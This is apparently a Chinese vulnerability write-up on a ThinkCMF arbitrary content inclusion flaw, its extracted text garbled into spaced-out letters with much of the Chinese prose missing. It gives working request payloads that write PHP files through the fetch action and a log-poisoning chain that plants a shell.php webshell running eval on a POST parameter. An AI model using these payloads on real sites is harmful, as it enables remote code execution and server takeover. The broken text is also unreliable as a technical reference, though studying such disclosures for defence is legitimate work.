[200] 2021-05-21_ThinkCMF框架任意内容包含漏洞

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-16
2021-05-21_ThinkCMF框架任意内容包含漏洞 T h i n k C M F x i a o   A d m i n   T e a m   2 0 2 1 - 0 5 - 2 1 T h i n k C M F T h i n k C M F P H P + M Y S Q L T h i n k P H P 3 . 2 . 3 T h i n k C M F S N S T h i n k C M F X 2 . 2 . 2 h t t p s : / / p a n . b a i d u . c o m / s / 1 r K 1 - _ B L m H 1 V P X s I U f r 1 V U w   w u h w T h i n k C M F W W W 访 T h i n k C M F   X 1 . 6 . 0 T h i n k C M F   X 2 . 1 . 0 T h i n k C M F   X 2 . 2 . 0 T h i n k C M F   X 2 . 2 . 1 T h i n k C M F   X 2 . 2 . 2
访 i n d e x . p h p a p p l i c a t i o n
I n d e x C o n t r o l l e r   H o m e b a s e C o n t r o l l e r g m a a P o r t a l I n d e x C o n t r o l l e r ( H o m e b a s e C o n t r o l l e r ) p u b l i c
p u b l i c d i s p l a y ( ) f e t c h ( ) , d i s p l a y   ( $ t h i s - > p a r s e T e m p l a t e   )   t e m p l a t e F i l e c h a r s e t c o n t e n t T y p e c o n t e n t t e m p l a t e F i l e p a r s e T e m p l a t e ( ) a p p l i c a t i o n C o m m o n C o n t r o l l e r A d m i n b a s e C o n t r o l l e r . c l a s s . p h p p a r s e T e m p l a t e ( ) p a r s e T e m p l a t e ( ) p a y l o a d   i n d e x . p h p ? a = d i s p l a y & t e m p l a t e F i l e = R E A D M E . m d f e t c h t e m p l a t e F i l e p r e f i x c o n t e n t p h p
1 . a d i s p l a y ( ) 2 . a f e t c h ( ) p a y l a o d 3 . 访 1 . p h p ? a = d i s p l a y & t e m p l a t e F i l e = R E A D M E . m d ? a = f e t c h & t e m p l a t e F i l e = p u b l i c / i n d e x & p r e f i x = ' ' & c o n t e n t = < p h p > f i l e _ p u t _ c o n t e n t s ( ' 1 . p h p ' , ' < ? p h p   p h p i n f o ( ) ;   ? > ' ) < / p h p >
T h i n k C M F g e t s h e l l g e t s h e l l t h i n k p h p   - -   ( ) t h i n k c m f 2 . x 使 t h i n k p h p 3 . x 使 P H P d a t a / r u n t i m e / L o g s / P o r t a l m . p h p ? a = d i s p l a y & t e m p l a t e F i l e = < ? p h p   f i l e _ p u t _ c o n t e n t s ( ' s h e l l . p h p ' , ' < ? p h p + e v a l ( $ _ P O S T [ " 6 6 6 6 " ] ) ; ? > ' ) ; d i e ( ) ; ? > h t t p : / / t a r g e t . d o m a i n / ? a = d i s p l a y & t e m p l a t e F i l e = d a t a / r u n t i m e / L o g s / P o r t a l / Y Y _ M M _ D D . l o g
s h e l l . p h p 使 h t t p : / / t a r g e t . d o m a i n / ? a = d i s p l a y & t e m p l a t e F i l e = d a t a / r u n t i m e / L o g s / P o r t a l / Y Y _ M M _ D D . l o g
使 h t t p : / / t a r g e t . d o m a i n / ? a = d i s p l a y & t e m p l a t e F i l e = < ? p h p   e v a l ( $ _ P O S T [ " 6 6 6 6 " ] ) ; ? > h t t p : / / t a r g e t . d o m a i n / ? a = d i s p l a y & t e m p l a t e F i l e = d a t a / r u n t i m e / L o g s / P o r t a l / Y Y _ M M _ D D . l o g
  H o m e b a s e C o n t r o l l e r . c l a s s . p h p     A d m i n b a s e C o n t r o l l e r . c l a s s . p h p     d i s p l a y     f e t c h     p r o t e c t e d
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则